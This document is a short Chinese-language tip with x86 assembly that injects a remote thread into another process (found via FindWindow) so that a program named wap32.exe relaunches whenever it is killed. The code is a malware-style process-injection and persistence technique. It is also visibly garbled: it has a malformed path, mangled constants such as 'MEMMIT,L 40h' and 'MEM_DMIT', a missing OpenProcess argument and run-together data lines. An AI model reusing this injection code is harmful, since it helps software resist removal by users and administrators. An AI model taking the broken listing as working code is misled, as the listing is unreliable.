此段程序采用公开的 Win2k注射远程线程,来保护指定进程始终处于运行状态,
WIN技巧:Win2k下进程不死术
。生成wap32.exe拷贝到c:下运行,则Wap32进程不死。
include Win32.inc
.386
.model flat,stdcall
.data
Protect2kProc proc ProcID: dword
call GetKnlOpenProcess
KnlOpenProcess dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
or eax,eax
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject dd ?
GetKnlWaitForSingleObject:
pop eax
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FileName-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec dd ?
GetKnlWinExec:
pop eax
call [eax],ecx,01
ExitProtectProc:
ret
Protect2kProc endp
FileName db "c:wap32.exe",0
KnlOpenProcessStr db "OpenProcess",0KnlWaitForObjectStr db "WaitForSingleObject",0
KnlWinExecStr db "WinExec",0
.code
extrn GetProcAddress: proc
extrn OpenProcess: proc
extrn FindWindowA: proc
extrn GetWindowThreadProcessId: proc
extrn VirtualAllocEx: proc
extrn VirtualFreeEx: proc
extrn WriteProcessMemory: proc
extrn GetCurrentProcessId: proc
extrn CreateRemoteThread: proc
extrn GetExitCodeThread: proc
extrn CloseHandle: proc
extrn WinExec: proc
extrn MessageBoxA: proc
extrn Sleep: proc
Start:
call GetProcAddress,077e60000h,offset KnlOpenProcessStr
mov KnlOpenProcess,eax
call GetProcAddress,077e60000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax
call GetProcAddress,077e60000h,offset KnlWinExecStr
mov KnlWinExec,eax
call FindWindowA,0,0
push eax
call GetWindowThreadProcessId,eax,esp
call OpenProcess,PROCESS_ALL_ACCESS,FALSE
or eax,eax
jz short OpenProcessError
mov ebx,eax
call VirtualAllocEx,ebx,NULL,1000h,MEMMIT,L 40h
or eax,eax
jz short OpenProcessError
mov edi,eax
push eax
call WriteProcessMemory,ebx,edi,OFF Protect2kProc,1000h,esp
call GetCurrentProcessId
call CreateRemoteThread,ebx,NULL,NULL,edi,eax,NULL,esp
call GetExitCodeThread,eax,esp
pop eax
;call VirtualFreeEx,ebx,edi,1000h,MEM_DMIT
call CloseHandle,ebx
call Sleep,100h
call MessageBoxA,0,offset FileName,offset FileName,0
OpenProcessError:
ret